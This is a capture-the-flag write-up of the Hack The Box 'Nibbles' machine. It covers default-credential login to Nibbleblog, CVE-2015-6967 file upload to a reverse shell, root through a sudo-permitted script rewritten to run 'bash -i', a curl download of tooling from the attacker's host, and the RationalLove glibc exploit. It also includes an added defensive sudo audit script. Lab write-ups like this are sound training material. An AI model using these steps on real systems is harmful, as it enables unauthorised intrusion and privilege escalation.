Nibbles (Linux) Write-up — LinEnum & How to call a bash shell with sudo priv

I’ve done this box a long time ago while following a TCM’s video, but I decided to give it a go again with fresh perspective and with the help of Ippsec’s walkthrough https://www.youtube.com/watch?v=s_0GcRGv6Ds

Nmap Scan Result:

Nmap scan report for 10.129.168.232
Host is up (0.11s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn’t have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
58848/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s do web enumeration first.

Visiting the IP, I found the nibbleblog directory which took me to a blog site.

Started the gobuster from the directory:

gobuster dir -u http://10.129.168.232/nibbleblog/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Version was found in: http://10.129.168.232/nibbleblog/README

Version: v4.0.3

Codename: Coffee
Release date: 2014-04-01

Site: http://www.nibbleblog.com
Blog: http://blog.nibbleblog.com
Help & Support: http://forum.nibbleblog.com
Documentation: http://docs.nibbleblog.com

Found the CVE for that version.

Vuln: CVE-2015-6967

“Unrestricted file upload vulnerability in the My Image plugin in Nibbleblog before 4.0.5 allows remote administrators to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in content/private/plugins/my_image/image.php.”

Found the admin.php page and attempted a login with username admin and password nibbles, which was successful.

Found a directory where I can upload a reverse shell script.

Uploaded a reverse shell and got the shell back.

I couldn’t get a tty, though.

“bash -i” makes the shell interactive,

or use the python3 pty option.

Running sudo -l reveals that /home/nibbler/personal/stuff/monitor.sh can be run as root without a password,

so I unzipped the file (unzip personal.zip) and removed the existing shell script.

Created a new file with vim:

#!/bin/bash
bash -i

Had some trouble typing this in vim, as it kept trying to add spaces.

We used the sudo rule to run the script, which spawns bash with root privileges.
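As an added defender-side check (not part of the original write-up), the script below parses sudo -l output like the one on this box and flags NOPASSWD targets the invoking user could replace; the sample output, hostname and reason strings are constructed, not taken from the box.

```python
import os
import re
import stat

# Constructed sample of `sudo -l` output modelled on this box: a NOPASSWD
# entry whose target script lives inside the invoking user's home directory.
SAMPLE_SUDO_L = """\
Matching Defaults entries for nibbler on nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin

User nibbler may run the following commands on nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

NOPASSWD_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+NOPASSWD:\s*(?P<cmds>.+)$")

def parse_nopasswd(sudo_l_output):
    """Return (runas, command_path) pairs for every NOPASSWD line."""
    entries = []
    for line in sudo_l_output.splitlines():
        m = NOPASSWD_RE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            path = cmd.strip().split()[0]  # keep the executable, drop arguments
            entries.append((m.group("runas").strip(), path))
    return entries

def risky_reasons(path, invoking_uid):
    """Why a NOPASSWD target could be swapped out by the invoking user."""
    if path == "ALL":
        return ["ALL: any command may be run without a password"]
    reasons = []
    if path.startswith(("/home/", "/tmp/", "/var/tmp/")):
        reasons.append("lives in a user-controlled directory")
    try:
        st = os.stat(path)
    except FileNotFoundError:
        reasons.append("target does not exist (could be created by the user)")
        return reasons
    if st.st_uid == invoking_uid:
        reasons.append("owned by the invoking user")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("group- or world-writable")
    return reasons

def audit(sudo_l_output, invoking_uid):
    """Map each NOPASSWD target to its risk reasons (empty list = looks fine)."""
    return {path: risky_reasons(path, invoking_uid)
            for _runas, path in parse_nopasswd(sudo_l_output)}
```

Run it on a real host with audit(subprocess.check_output(["sudo", "-l"], text=True), os.getuid()); the fix for an entry that gets flagged is to move the script to a root-owned, non-writable location and point the sudoers rule there.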

Running Linux Exploit Suggester

GitHub — mzet-/linux-exploit-suggester: Linux privilege escalation auditing tool

Host it with Python’s SimpleHTTPServer and download it on the Nibbles box with:

curl -o enum.sh IP/enum.sh

We’ll try RationalLove:

glibc < 2.26 — ‘getcwd()’ Local Privilege Escalation — Linux local Exploit (exploit-db.com)

Get the exploit and upload it again.

We need to compile the C file with gcc -o FILE_NAME Rationallove.c, per the instructions.

For some reason, I had to execute it twice to get it to work, but it worked.

Hacked!!! Capture complete!

HTTPS://www.Gorigorisensei.com